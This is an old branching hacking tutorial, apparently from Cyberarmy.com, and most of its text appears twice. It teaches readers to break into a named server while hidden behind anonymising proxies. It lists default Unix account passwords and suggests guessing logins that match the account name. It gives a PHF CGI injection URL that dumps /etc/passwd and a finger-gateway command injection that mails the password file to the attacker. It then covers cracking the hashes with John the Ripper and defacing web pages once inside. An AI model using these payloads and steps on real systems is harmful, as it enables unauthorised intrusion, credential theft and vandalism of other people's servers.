0
[This worked - I got the server type!]
[None of that worked...]
RUNNING LAME PROGRAMS:
You *need* to know the server type to have any hope of hacking the thing. How do you expect to run exploits against it if you cant even figure out what you're dealing with here?
A final resort is to run a program called Whats Running? It doesn't work very well, but will sometimes tell you the server type. It will also probably be logged by the victim server.
If that doesn't work, do anything to find the server type. Even write them an e-mail asking what operating system they're running.
[Ok, I've got the Info... Now I want access!]
HACKING THROUGH THE PASSWORD:
We will now try to go through the front door of the server. As to our analogy, we are trying to find the combination of the safe.
[Ok, I Want Root!]
[Nah, I already know this server will need exploits]
EASY THINGS FIRST:
You would kick yourselves if ya spent weeks trying advanced hacking with exploits, IP spoofing and social
engineering, just to find that we could have got in by using:
$Login: root
$Password: root
So, let’s just try this first and get it out of the way. Unix comes set up with some default passwords, and
sometimes these are not changed. So, we telnet to froggy.com.au .
Don’t use your usual telnet program. Unless you are using a filched or anonymous account, it will show
your IP address to froggy.com.au . With your proxies changed, and everything set for stealth, switch back to the Anonymous Telnet window.
Then try the following accounts and passwords:
ACCOUNT: PASSWORD
(login) root: (password)root
sys: sys / system / bin
bin: sys / bin
mountfsys: mountfsys
adm: adm
uucp: uucp
nuucp: anon
anon: anon
user: user
games: games
install: install
demo: demo
umountfsys: umountfsys
sync: sync
admin: admin
guest: guest
daemon: daemon
The accounts root, mountfsys, umountfsys, install, and sometimes sync are root level accounts, meaning they have sysop power, or total power. Other logins are just "user level" logins meaning they only have power
over what files/processes they own.
[Nup... Didn't think it would work]
[Incredible... That Lame Trick Actually Worked!]
USING THE LOGIN NAMES:
Still simple things first. About 1 in 20 people are stupid enough to have the same login name and password. With your list of all the email addresses or finger information you dug from the site, try this.
For example, if the web site made a reference to fred@froggy.com.au , try logging in (through telnet or a FTP
program to their server) as:
$Login: Fred
$Password: Fred
Do this with all the names you have found - you might get lucky.
Did this work?
[Nah, they had some baddass security, didn't work]
[Oh, Golly Gee... I got access to one of the accounts!]
GETTING THE PASSWD FILE:
You probably had no luck until now. Actually, most hacking techniques only have a slim chance of success. You just try hundreds of slim chances till you get it.
Assuming you were trying to log in on a Unix system, you may have been wondering how Unix checks to see whether the passwords you gave were correct or not. There is a file called ‘passwd’ on each Unix system which has all the passwords for each user. So, if we can’t guess the passwords, we will now try to rip this file and decrypt it.
[Make it so, Number 1]
ANCIENT CHINESE FTP METHOD:
Your browser should be set to use the fake proxies. We will keep using this browser to FTP, because it cannot be easily traced, whereas something like CuteFTP can be traced to you because it can't use proxies. If in your port scan, you found an opne port 21, its a pretty good indication that they run an FTP server.
Using your stealth browser, try to FTP to froggy.com.au . Example: ftp://froggy.com.au
If that does not work, try to FTP to ftp.froggy.com.au . Example: ftp://ftp.froggy.com.au
If that does not work, try to FTP to the Domain Name Servers listed when you did your WHOIS search. Example: ftp://ns1.froggy.com.au
[Ok, I'm In]
[Nah, stupid thing won't let me in]
ANCIENT CHINESE FTP METHOD:
Now you are connected to froggy.com.au ’s FTP server, click on their \etc directory.
You should see a file called ‘passwd’ and maybe a file called ‘group’. Download the ‘passwd’ file, and
look at it.
If it looks like this when you open it, you are in luck:
root:2fkbNba29uWys:0:1:Operator:/:/bin/csh
admin:rYsKMjnvRppro:100:11:WWW administrator:/home/Common/WWW:/bin/csh
kangaroo:3A62i9qr:1012:10:Hisaharu
[etc.]
For example, we know a login is “kangaroo” and their encrypted password is “3A62i9qr”. Note - this is not their password, but an encrypted form of their password.
Or, did it look more like this:
root:*:0:1:Operator:/:/bin/csh
admin:*:100:11:WWW administrator:/home/Common/WWW:/bin/csh
kangaroo:*:1012:10:Hisaharu TANAKA:/home/user/kangaroo:/usr/local/bin/tcsh
Is the second, encrypted password, section replaced by *’s or x’s? This is bad – it is called a shadowed
password and cannot be decrypted. This is how most passwd files are now days. However, if you got a
passwd file which has some non-shadowed entries, you can put your hand to decrypting it.
[Nah, It was all shadowed]
[Nah, couldn't find the passwd file in the first place]
[Yes! I think I got some non-shadowed passwords]
DECRYPTING PASSWD FILES:
There are a few programs around which were written to decrypt Unix passwd files. The most famous one was called ‘Cracker Jack’. Many ‘hacking’ texts strongly recommend this file – but they are mostly talking rubbish. Its old and most systems will just crash when they try to run it, as it uses weird memory allocation.
The best Unix cracker around is currently called 'John the Ripper 1.5’. It is readily avaliable. It was only written in the last year or so, and is a lot faster than Cracker Jack ever was. John the Ripper was also designed with Pentiums in mind, and the brute force techique used is genius. But you have to go down to DOS to use it.
You will also need a large ‘wordfile’, with every English word. Bigger the better. The Crack Programs test every word in the wordfile against the passwd file. If the wordfile is big enough, you have a good chance of getting a password.
[Yes! I Got Me Some Decrypted Passwords!]
[Nah, the Encryption was too Good]
[Give me some reading about all the different password crackers, where to find them, etc.]
THE OLD-STYLE PHF TECHNIQUE:
Although most servers have now trashed a program called PHF, let's just make sure... It is is working, it lets you get the passwd file remotely, even if it is inside hidden and root access only directories.
In the Overlord Anonymizer, type:
http://www.froggy.com.au /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd.
OVERLORD ANONYMIZER
If PHF is active (often not), this string will print out the etc/passwd file strait to your web browser all you need to do is save it as a file and again run a crack program against it.
Now, if you see the words 'Smile! You're on Candid Camera!', it means that the server is protected against this hack, and has logged your IP. But don't worry. So long as you were using the anonymizer, you are safe.
[Nah, they fixed that PHF Bug Problem]
[Yes! I Got Me Some Encrypted Passwords!]
FINGER BOX HACKING:
Finger servers are hacker's friends. Let's find out whether www.froggy.com.au has a finger server.
In the Anonymizer, assuming that the server's name starts with www, type www.froggy.com.au /cgi-bin/finger
OVERLORD ANONYMIZER
If the finger gateway is operational a box should appear for you to enter the name you want to finger. If it is operational you have another chance to receive the etc/passwd file.
Okay, 1/ get your list of e-mail addresses you found for the site (let's pretend one of them is "kangaroo@froggy.com.au ", and that your email address is "your@email.org")
2/ Go back to the finger box, and type this in (changing these email addresses for the real ones):
kangaroo@froggy.com.au ; /bin/mail your@email.org < etc/passwd This takes the passwd file through kangaroo@froggy.com.au and emails it to your email address. If this works you now have the etc/passwd file in your mailbox.... you can now run a crack program against it and have a little fun on their box. [Nah, it didn't work] [Yes! I Got Me Some Encrypted Passwords!] LINUX INSTALLATION All the above really has given you the basic ideas. To do anything firther, and impliment any real exploits, you will have to put a Linux operating system on your computer. Below are some instructions on how to quickly and easily install Linux on your computer. You can just download the files below for free, and install them in a directory on your MS-DOS / Windows system! That's right, you dont even have to repartition your Hard Drive! Okay... I will make this as basic and free as possible. I will assume you are running Windows 95 or 98 and have never seen Linux before. You have a Hard Drive with at least 100MB free. Youve got a floppy drive, etc. You know how to unzip files. And you dont want to spend any money. Luckily, Linux is free and easy to set up. 1/ Download this file (Australia). It's big, like 34MB. But it's all you need. If the site there is overloaded, get it here .
2/ What you have is a version of Slackware Linux, called zipslack. It's a very simple version of Slackware Linux to set up. I don't use Slackware, and there are some better versions around now - like RedHat 5.2. But, it is a good stable version - and, like I say, very simple to download and setup. Good for a Linux test drive.
3/ Ok, make a directory called 'Linux' on your Hard Drive. That's right, with this distro, you dont even have to repartition your drive. It can be on the same Hard Drive you have Windows on! (I told you this would be easy). Just make sure its a major directory on your hard drive, like c:\linux - not in a subdirectory anywhere.
4/ Now, just unzip all the contents of the zipslack.zip into the right directories, like c:\linux\etc, c:\linux\usr, etc.
5/ Now, heres the hardest part. You will have to edit the \linux\linux.bat file. Open it in an editor.
6/ You'll need to edit the LINUX.BAT file, and make sure the root=/dev/XXXX points to your Hard Drive. If you have put it on your main hard drive, you can make the line:
\linux\loadlin \linux\vmlinuz root=/dev/hda1 (hda1 means the IDE1 Master HDD)
I have Linux on my drive D: (the IDE2 Master HDD), and for me the line would be:
\linux\loadlin \linux\vmlinuz root=/dev/hdc1
7/ If you are unsure, the Linux.bat file has a long list of examples. Just guess. If you get it wrong, you'll still be able to use scrollback (right shift key and PageUp) when the kernel halts to go back and look at your partitions, noting the names Linux gives them. With this information, you should be able to edit the LINUX.BAT correctly.
8/ Well, I skipped ahead of myself. You are now (already) ready to boot up your Linux system. Who said it was hard?
9/ Ok, you must go 'Shut Down' and 'Restart in MS-DOS Mode'. Then just go to the \Linux directory ('cd linux') and run Linux.bat
10/ The Linux system will load itself over MS-DOS (though you don't need to load it over DOS - later you can make a boot-disk so only linux loads).
11/ You will see a whole lot of stuff loading. Then you will see a login: prompt.
12/ You have an operating system just like all the big net servers have!
13/ Okay, just type in 'root', and you have root access on the system. You will want to give yourself a password, so type 'passwd'. Choose something you will remember. Without it, you cannot log in.
14/ Now you will have a black screen with a # looking at you. Dont let that worry you - its just like a MS-DOS screen. A few commands for now: 'ls' (like 'dir' in MS-DOS), 'cd' (change directory, like dos), 'pico' (an editor, use like 'pico text.txt'), and 'mc' (this is a nice menu program that comes with zipslack).
15/ Now, type 'setup'.
16/ Setup your mouse, network settings, screen stuff. Really easy. Just like - 'are you using a 2 button mouse or 3'? Easy.
17/ Now, if you want net access, through this - type 'pppsetup'. This starts the ppp (point to point protocol) setup. You will need to know all your internet settings, like your Gateway, Nameserver numbers, etc. If you dont know these, go back to windows and see what values you used from the Control Panel : Internet section.
18/ Okay. Reboot. Your mouse should be working, with some luck. Hopefully, your modem will be able to dial. Though, often not. If you have a standard external modem on Com 2, it is probably okay. Otherwise, it's sometimes a pain to configure your modem for Linux.
19/ If you are having modem troubles, type 'mc to run the Midnight Commander. Open the 'etc' directory, then 'rc.d', then 'serials.rc'. Comment out the auto config section with '#' signs. And go to the manual config section. Uncomment /dev/cua0 (Com 1:) and /dev/cua1 (Com 2:) - or /dev/cua2 or cua3 (Com 3: or 4:) for internal modem users. Now, from windows, go to Accessories:System Tools:System Information (Win 98) to get the IRQ and Port Settings for your modem. If you are in Win95, I think you have to run something called msd.com in the \windows directory. Put these setting in. Then, edit S.rc and at the bottom, uncomment the place where it says to call the serials.rc file.
20/ If you have a CD-Rom you can also edit S.rc so that it checks for a CD Rom during bootup.
21/ All things going well, you should now have a fully functional Unix type system on your computer. You can download all your latest little X-Crush programs (in .tgz format). To setup Software - say a Linux stealth port scanner, save the .tgz file in a directory and run 'pkgtool'. Then go 'install file'. Real easy. If it is a C program, type 'gcc program.c' to compile it.
22/ Well, you are missing a Windows type interface. You dont need one. But if you want to surf using Linux, etc. It is better to have a graphical interface - although you can run a browser called 'lynx' just through the vanilla Linux interface.
23/ You can get some things, like X-Windows from ftp.cdrom.com/pub/linux/slackware/slakware/x1/
24/ Just get all the files that look vital (about 8 of them), and run pkgtool to install them all. You will probably find that setting up X-Win for the first time is a huge pain. It was for me at least - you need to know, for example, the horizontal and vertical refresh rates of your monitor. Then, get something like the Linux Netscape, or Arena as a browser. These run thru X-Windows.
25/ You will have fun tweaking everything as you like it. There are dozens of windows interfaces to choose from. Some looks almost identical to Win95.
26/ Where from here? You can now do practically anything - you basically have all the net power your ISP does, except for all the phone lines. You can let people use you as a dial up ISP, you can host web pages and set up FTP sites to run from your computer. You can set up email addresses, nameservers... anything.
27/ Because Linux is the same software as most ISPs run, a lot of hackers use Linux. You will be able to issue commands to other servers. You can ask other servers about themselves. For example, type 'showmount -e victim.com'. You can also run things like 'ping', and 'traceroute' directly from your command line. You can send mail from your own sendmail program so that it is untraceable.
Some last incentives, if you were brought up in the Windows world and are afraid of command prompts, just type 'mc'. The zipslack distro comes with this 'Midnight Commander' - which I use a lot. And play a few games on the things. There are a few old favourites installed by default - like 'trek', and 'adventure', etc. If you were in computers 20 years ago, you will know what I mean. The games directory is in usr/games.
If you have got any more problems, there are a lot of people on the IRC #Linux channel on undernet who are very helpful. If your Linux is set up to the net, you can run the Linux Bitch-X IRC program to get there. Zipslack also has pine (for email), tin (for newsgroups), and lynx (for surfing).
Fact is, when you got this all working for a few weeks (and probably loving it), you will no doubt like to try some more advanced Linux distros. Although there are a lot of personal feelings about various distributions, I recommend RedHat 5.2 Linux. You will find it very easy to install.
If you are happy buying through Amazon.Com, here is the best Linux deal I've been able to find anywhere. It deals with the 3 major Linux distributions: Red Hat, Slackware, and Debian - with 3 CDs. It also contains a very good install guide. All for about half the price of the single 'official' RedHat CD. If you like this Linux stuff, I recommend you get it - or at least make sure you get a book that is written very recently.[an error occurred while processing this directive]
[Nah, it didn't work]
[Yes! I Got Me Some Encrypted Passwords!]
CURRENT LIMIT:
You have reached the current limit of the tutorials.... I will add further steps when I get the time and if people like these lessons. Also, if people want to write sections up for this, just mail the sections to me, to the e-mail address listed at Cyberarmy.Com.
Until this gets bigger, I can suggest a few books that teach hacking. I've found that a lot of books are rubbish and just teach how to change screen colours, but there are a few that every hacker should have in their library.
THE ESSENTIAL HACKER'S LIBRARY:
ESSENTIAL BOOKS:
1. MAXIMUM SECURITY: Of course, Maximum Security has to be at number one. I guess this would probably be the central book in any hacker's library. Goes through a heap of techniques like a textbook with over 900 pages.
2. THE HAPPY HACKER: Essential for newbies. Although this book is bagged a lot by people who hate Carolyn, I think most people agree it would be the perfect first book a newbie should read. Explains things pretty well, spelling mistakes, but probably an essential newbie primer. Thou, as I say, if you know your stuff you can safely forget this one.
ESSENTIAL SOFTWARE:
1. LINUX: You will need to change to Linux to do any serious hacking. But thankfully, it is fairly simple and you can just set up Linux in a seperate partition on your Hard Drive and set for a dual boot option: usually windows, and when you are hacking, Linux. You amount of 'Net Power' increases 500%. If you want to buy Linux, make sure you get the latest version not an obsolete one. There are also several different 'flavours' of Linux, you will probably want to start with RedHat, then possibly move to Slackware after a year or so. So, make sure you get a deal which gives you the oportunity to check out some of the different distributions. By far the best Linux deal I've found around is this one . It has an excellent Linux manual, and comes with three seperate Linux distributions on 3 CDs, including the very latest RedHat and Slackware. It's also excellent value (about half the price of buying the single 'official' RedHat CD).
NOT ESSENTIAL, BUT RECOMMENDED BOOKS:
(These books are mainly just part of the Hacker Culture)
3. THE WATCHMAN: The Twisted Life and Crimes of Serial Hacker Kevin Poulsen: This one will not teach you anything, so stuff it if you just want to learn. Although it was one of the best reads I ever had. More like a thriller book, but it was real! The Kevin Mitnick books are about the same, but this one deals a lot with phreaking, and scamming radio stations of cars. But, as I say, it doesn't go through any techniques, so stuff it if you just want to learn stuff.
4. THE FUGITIVE GAME: Online With Kevin Mitnick: Again, a really fun read (though, I prefer the Poulsen book) but it doesn't go through any hacking techniques. But I have to list it here because it is such a good read. It's also a really cheap buy.
5. TAKEDOWN : The Pursuit and Capture of Kevin Mitnick: This is the other side of the Mitnick story (written by the cops who chased him). Interesting, but the essential Mitnick book is the one above. Though, this is a very good primer on how the FBI operates to capture hackers. But, again, no techniqes listed. For techniques, you would only have luck in the first two books listed.
Okay, as for programming books - stuff it. You can download the things for free if you search for "perl + programming + tutorial" and things like that. Unless you like printed books, forget that. So, the only other thing is Linux. You will need to have Linux as a dual boot option on your PC if you want to do any serious hacking.
Some books that suck: these are some books that are going around that are a rip-off. SECRETS OF A SUPER HACKER: This is another book that a lot of people have. The book seemed like a real waste of time to me.
So, keep going through this tutorial as it gets bigger, read anything you find on the web. Get some of the major books above, at least 1 and 2, and read them very carefully - four or five times. Join your local Linux users group, if you have one. And, later on, download a few guides on programming and read through them when you get some time. With some effort (it isn't easy), you can become a respected hacker and take control of the Net.
[Back to Index]
CONGRATULATIONS:
You have gained access.
If you now have the login code and password, you may use the users mail account, FTP priviliges (change their web pages by uploading new ones), and HTTP access.
(If you have only got access to a user level account, do not despair. If you have a user level account, it is easy to use that to later get a root level account. More on this when this study is made bigger).
[None of that worked...]
RUNNING LAME PROGRAMS:
You *need* to know the server type to have any hope of hacking the thing. How do you expect to run exploits against it if you cant even figure out what you're dealing with here?
A final resort is to run a program called Whats Running? It doesn't work very well, but will sometimes tell you the server type. It will also probably be logged by the victim server.
If that doesn't work, do anything to find the server type. Even write them an e-mail asking what operating system they're running.
[Ok, I've got the Info... Now I want access!]
HACKING THROUGH THE PASSWORD:
We will now try to go through the front door of the server. As to our analogy, we are trying to find the combination of the safe.
[Ok, I Want Root!]
[Nah, I already know this server will need exploits]
EASY THINGS FIRST:
You would kick yourselves if ya spent weeks trying advanced hacking with exploits, IP spoofing and social
engineering, just to find that we could have got in by using:
$Login: root
$Password: root
So, let’s just try this first and get it out of the way. Unix comes set up with some default passwords, and
sometimes these are not changed. So, we telnet to froggy.com.au .
Don’t use your usual telnet program. Unless you are using a filched or anonymous account, it will show
your IP address to froggy.com.au . With your proxies changed, and everything set for stealth, switch back to the Anonymous Telnet window.
Then try the following accounts and passwords:
ACCOUNT: PASSWORD
(login) root: (password)root
sys: sys / system / bin
bin: sys / bin
mountfsys: mountfsys
adm: adm
uucp: uucp
nuucp: anon
anon: anon
user: user
games: games
install: install
demo: demo
umountfsys: umountfsys
sync: sync
admin: admin
guest: guest
daemon: daemon
The accounts root, mountfsys, umountfsys, install, and sometimes sync are root level accounts, meaning they have sysop power, or total power. Other logins are just "user level" logins meaning they only have power
over what files/processes they own.
[Nup... Didn't think it would work]
[Incredible... That Lame Trick Actually Worked!]
USING THE LOGIN NAMES:
Still simple things first. About 1 in 20 people are stupid enough to have the same login name and password. With your list of all the email addresses or finger information you dug from the site, try this.
For example, if the web site made a reference to fred@froggy.com.au , try logging in (through telnet or a FTP
program to their server) as:
$Login: Fred
$Password: Fred
Do this with all the names you have found - you might get lucky.
Did this work?
[Nah, they had some baddass security, didn't work]
[Oh, Golly Gee... I got access to one of the accounts!]
GETTING THE PASSWD FILE:
You probably had no luck until now. Actually, most hacking techniques only have a slim chance of success. You just try hundreds of slim chances till you get it.
Assuming you were trying to log in on a Unix system, you may have been wondering how Unix checks to see whether the passwords you gave were correct or not. There is a file called ‘passwd’ on each Unix system which has all the passwords for each user. So, if we can’t guess the passwords, we will now try to rip this file and decrypt it.
[Make it so, Number 1]
ANCIENT CHINESE FTP METHOD:
Your browser should be set to use the fake proxies. We will keep using this browser to FTP, because it cannot be easily traced, whereas something like CuteFTP can be traced to you because it can't use proxies. If in your port scan, you found an opne port 21, its a pretty good indication that they run an FTP server.
Using your stealth browser, try to FTP to froggy.com.au . Example: ftp://froggy.com.au
If that does not work, try to FTP to ftp.froggy.com.au . Example: ftp://ftp.froggy.com.au
If that does not work, try to FTP to the Domain Name Servers listed when you did your WHOIS search. Example: ftp://ns1.froggy.com.au
[Ok, I'm In]
[Nah, stupid thing won't let me in]
ANCIENT CHINESE FTP METHOD:
Now you are connected to froggy.com.au ’s FTP server, click on their \etc directory.
You should see a file called ‘passwd’ and maybe a file called ‘group’. Download the ‘passwd’ file, and
look at it.
If it looks like this when you open it, you are in luck:
root:2fkbNba29uWys:0:1:Operator:/:/bin/csh
admin:rYsKMjnvRppro:100:11:WWW administrator:/home/Common/WWW:/bin/csh
kangaroo:3A62i9qr:1012:10:Hisaharu
[etc.]
For example, we know a login is “kangaroo” and their encrypted password is “3A62i9qr”. Note - this is not their password, but an encrypted form of their password.
Or, did it look more like this:
root:*:0:1:Operator:/:/bin/csh
admin:*:100:11:WWW administrator:/home/Common/WWW:/bin/csh
kangaroo:*:1012:10:Hisaharu TANAKA:/home/user/kangaroo:/usr/local/bin/tcsh
Is the second, encrypted password, section replaced by *’s or x’s? This is bad – it is called a shadowed
password and cannot be decrypted. This is how most passwd files are now days. However, if you got a
passwd file which has some non-shadowed entries, you can put your hand to decrypting it.
[Nah, It was all shadowed]
[Nah, couldn't find the passwd file in the first place]
[Yes! I think I got some non-shadowed passwords]
DECRYPTING PASSWD FILES:
There are a few programs around which were written to decrypt Unix passwd files. The most famous one was called ‘Cracker Jack’. Many ‘hacking’ texts strongly recommend this file – but they are mostly talking rubbish. Its old and most systems will just crash when they try to run it, as it uses weird memory allocation.
The best Unix cracker around is currently called 'John the Ripper 1.5’. It is readily avaliable. It was only written in the last year or so, and is a lot faster than Cracker Jack ever was. John the Ripper was also designed with Pentiums in mind, and the brute force techique used is genius. But you have to go down to DOS to use it.
You will also need a large ‘wordfile’, with every English word. Bigger the better. The Crack Programs test every word in the wordfile against the passwd file. If the wordfile is big enough, you have a good chance of getting a password.
[Yes! I Got Me Some Decrypted Passwords!]
[Nah, the Encryption was too Good]
[Give me some reading about all the different password crackers, where to find them, etc.
THE OLD-STYLE PHF TECHNIQUE:
Although most servers have now trashed a program called PHF, let's just make sure... It is is working, it lets you get the passwd file remotely, even if it is inside hidden and root access only directories.
In the Overlord Anonymizer, type:
http://www.froggy.com.au /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd.
OVERLORD ANONYMIZER
If PHF is active (often not), this string will print out the etc/passwd file strait to your web browser all you need to do is save it as a file and again run a crack program against it.
Now, if you see the words 'Smile! You're on Candid Camera!', it means that the server is protected against this hack, and has logged your IP. But don't worry. So long as you were using the anonymizer, you are safe.
[Nah, they fixed that PHF Bug Problem]
[Yes! I Got Me Some Encrypted Passwords!]
FINGER BOX HACKING:
Finger servers are hacker's friends. Let's find out whether www.froggy.com.au has a finger server.
In the Anonymizer, assuming that the server's name starts with www, type www.froggy.com.au /cgi-bin/finger
OVERLORD ANONYMIZER
If the finger gateway is operational a box should appear for you to enter the name you want to finger. If it is operational you have another chance to receive the etc/passwd file.
Okay, 1/ get your list of e-mail addresses you found for the site (let's pretend one of them is "kangaroo@froggy.com.au ", and that your email address is "your@email.org")
2/ Go back to the finger box, and type this in (changing these email addresses for the real ones):
kangaroo@froggy.com.au ; /bin/mail your@email.org < etc/passwd This takes the passwd file through kangaroo@froggy.com.au and emails it to your email address. If this works you now have the etc/passwd file in your mailbox.... you can now run a crack program against it and have a little fun on their box. [Nah, it didn't work] [Yes! I Got Me Some Encrypted Passwords!] LINUX INSTALLATION All the above really has given you the basic ideas. To do anything firther, and impliment any real exploits, you will have to put a Linux operating system on your computer. Below are some instructions on how to quickly and easily install Linux on your computer. You can just download the files below for free, and install them in a directory on your MS-DOS / Windows system! That's right, you dont even have to repartition your Hard Drive! Okay... I will make this as basic and free as possible. I will assume you are running Windows 95 or 98 and have never seen Linux before. You have a Hard Drive with at least 100MB free. Youve got a floppy drive, etc. You know how to unzip files. And you dont want to spend any money. Luckily, Linux is free and easy to set up. 1/ Download this file
2/ What you have is a version of Slackware Linux, called zipslack. It's a very simple version of Slackware Linux to set up. I don't use Slackware, and there are some better versions around now - like RedHat 5.2. But, it is a good stable version - and, like I say, very simple to download and setup. Good for a Linux test drive.
3/ Ok, make a directory called 'Linux' on your Hard Drive. That's right, with this distro, you dont even have to repartition your drive. It can be on the same Hard Drive you have Windows on! (I told you this would be easy). Just make sure its a major directory on your hard drive, like c:\linux - not in a subdirectory anywhere.
4/ Now, just unzip all the contents of the zipslack.zip into the right directories, like c:\linux\etc, c:\linux\usr, etc.
5/ Now, heres the hardest part. You will have to edit the \linux\linux.bat file. Open it in an editor.
6/ You'll need to edit the LINUX.BAT file, and make sure the root=/dev/XXXX points to your Hard Drive. If you have put it on your main hard drive, you can make the line:
\linux\loadlin \linux\vmlinuz root=/dev/hda1 (hda1 means the IDE1 Master HDD)
I have Linux on my drive D: (the IDE2 Master HDD), and for me the line would be:
\linux\loadlin \linux\vmlinuz root=/dev/hdc1
7/ If you are unsure, the Linux.bat file has a long list of examples. Just guess. If you get it wrong, you'll still be able to use scrollback (right shift key and PageUp) when the kernel halts to go back and look at your partitions, noting the names Linux gives them. With this information, you should be able to edit the LINUX.BAT correctly.
8/ Well, I skipped ahead of myself. You are now (already) ready to boot up your Linux system. Who said it was hard?
9/ Ok, you must go 'Shut Down' and 'Restart in MS-DOS Mode'. Then just go to the \Linux directory ('cd linux') and run Linux.bat
10/ The Linux system will load itself over MS-DOS (though you don't need to load it over DOS - later you can make a boot-disk so only linux loads).
11/ You will see a whole lot of stuff loading. Then you will see a login: prompt.
12/ You have an operating system just like all the big net servers have!
13/ Okay, just type in 'root', and you have root access on the system. You will want to give yourself a password, so type 'passwd'. Choose something you will remember. Without it, you cannot log in.
14/ Now you will have a black screen with a # looking at you. Dont let that worry you - its just like a MS-DOS screen. A few commands for now: 'ls' (like 'dir' in MS-DOS), 'cd' (change directory, like dos), 'pico' (an editor, use like 'pico text.txt'), and 'mc' (this is a nice menu program that comes with zipslack).
15/ Now, type 'setup'.
16/ Setup your mouse, network settings, screen stuff. Really easy. Just like - 'are you using a 2 button mouse or 3'? Easy.
17/ Now, if you want net access, through this - type 'pppsetup'. This starts the ppp (point to point protocol) setup. You will need to know all your internet settings, like your Gateway, Nameserver numbers, etc. If you dont know these, go back to windows and see what values you used from the Control Panel : Internet section.
18/ Okay. Reboot. Your mouse should be working, with some luck. Hopefully, your modem will be able to dial. Though, often not. If you have a standard external modem on Com 2, it is probably okay. Otherwise, it's sometimes a pain to configure your modem for Linux.
19/ If you are having modem troubles, type 'mc to run the Midnight Commander. Open the 'etc' directory, then 'rc.d', then 'serials.rc'. Comment out the auto config section with '#' signs. And go to the manual config section. Uncomment /dev/cua0 (Com 1:) and /dev/cua1 (Com 2:) - or /dev/cua2 or cua3 (Com 3: or 4:) for internal modem users. Now, from windows, go to Accessories:System Tools:System Information (Win 98) to get the IRQ and Port Settings for your modem. If you are in Win95, I think you have to run something called msd.com in the \windows directory. Put these setting in. Then, edit S.rc and at the bottom, uncomment the place where it says to call the serials.rc file.
20/ If you have a CD-Rom you can also edit S.rc so that it checks for a CD Rom during bootup.
21/ All things going well, you should now have a fully functional Unix type system on your computer. You can download all your latest little X-Crush programs (in .tgz format). To setup Software - say a Linux stealth port scanner, save the .tgz file in a directory and run 'pkgtool'. Then go 'install file'. Real easy. If it is a C program, type 'gcc program.c' to compile it.
22/ Well, you are missing a Windows type interface. You dont need one. But if you want to surf using Linux, etc. It is better to have a graphical interface - although you can run a browser called 'lynx' just through the vanilla Linux interface.
23/ You can get some things, like X-Windows from ftp.cdrom.com/pub/linux/slackware/slakware/x1/
24/ Just get all the files that look vital (about 8 of them), and run pkgtool to install them all. You will probably find that setting up X-Win for the first time is a huge pain. It was for me at least - you need to know, for example, the horizontal and vertical refresh rates of your monitor. Then, get something like the Linux Netscape, or Arena as a browser. These run thru X-Windows.
25/ You will have fun tweaking everything as you like it. There are dozens of windows interfaces to choose from. Some looks almost identical to Win95.
26/ Where from here? You can now do practically anything - you basically have all the net power your ISP does, except for all the phone lines. You can let people use you as a dial up ISP, you can host web pages and set up FTP sites to run from your computer. You can set up email addresses, nameservers... anything.
27/ Because Linux is the same software as most ISPs run, a lot of hackers use Linux. You will be able to issue commands to other servers. You can ask other servers about themselves. For example, type 'showmount -e victim.com'. You can also run things like 'ping', and 'traceroute' directly from your command line. You can send mail from your own sendmail program so that it is untraceable.
Some last incentives, if you were brought up in the Windows world and are afraid of command prompts, just type 'mc'. The zipslack distro comes with this 'Midnight Commander' - which I use a lot. And play a few games on the things. There are a few old favourites installed by default - like 'trek', and 'adventure', etc. If you were in computers 20 years ago, you will know what I mean. The games directory is in usr/games.
If you have got any more problems, there are a lot of people on the IRC #Linux channel on undernet who are very helpful. If your Linux is set up to the net, you can run the Linux Bitch-X IRC program to get there. Zipslack also has pine (for email), tin (for newsgroups), and lynx (for surfing).
Fact is, when you got this all working for a few weeks (and probably loving it), you will no doubt like to try some more advanced Linux distros. Although there are a lot of personal feelings about various distributions, I recommend RedHat 5.2 Linux. You will find it very easy to install.
If you are happy buying through Amazon.Com, here is
[Nah, it didn't work]
[Yes! I Got Me Some Encrypted Passwords!]
CURRENT LIMIT:
You have reached the current limit of the tutorials.... I will add further steps when I get the time and if people like these lessons. Also, if people want to write sections up for this, just mail the sections to me, to the e-mail address listed at Cyberarmy.Com.
Until this gets bigger, I can suggest a few books that teach hacking. I've found that a lot of books are rubbish and just teach how to change screen colours, but there are a few that every hacker should have in their library.
THE ESSENTIAL HACKER'S LIBRARY:
ESSENTIAL BOOKS:
1. MAXIMUM SECURITY
2. THE HAPPY HACKER
ESSENTIAL SOFTWARE:
1. LINUX
NOT ESSENTIAL, BUT RECOMMENDED BOOKS:
(These books are mainly just part of the Hacker Culture)
3. THE WATCHMAN
4. THE FUGITIVE GAME
5. TAKEDOWN
Okay, as for programming books - stuff it. You can download the things for free if you search for "perl + programming + tutorial" and things like that. Unless you like printed books, forget that. So, the only other thing is Linux. You will need to have Linux as a dual boot option on your PC if you want to do any serious hacking.
Some books that suck: these are some books that are going around that are a rip-off. SECRETS OF A SUPER HACKER
So, keep going through this tutorial as it gets bigger, read anything you find on the web. Get some of the major books above, at least 1 and 2, and read them very carefully - four or five times. Join your local Linux users group, if you have one. And, later on, download a few guides on programming and read through them when you get some time. With some effort (it isn't easy), you can become a respected hacker and take control of the Net.
[Back to Index]
CONGRATULATIONS:
You have gained access.
If you now have the login code and password, you may use the users mail account, FTP priviliges (change their web pages by uploading new ones), and HTTP access.
(If you have only got access to a user level account, do not despair. If you have a user level account, it is easy to use that to later get a root level account. More on this when this study is made bigger).
0Awesome Comments!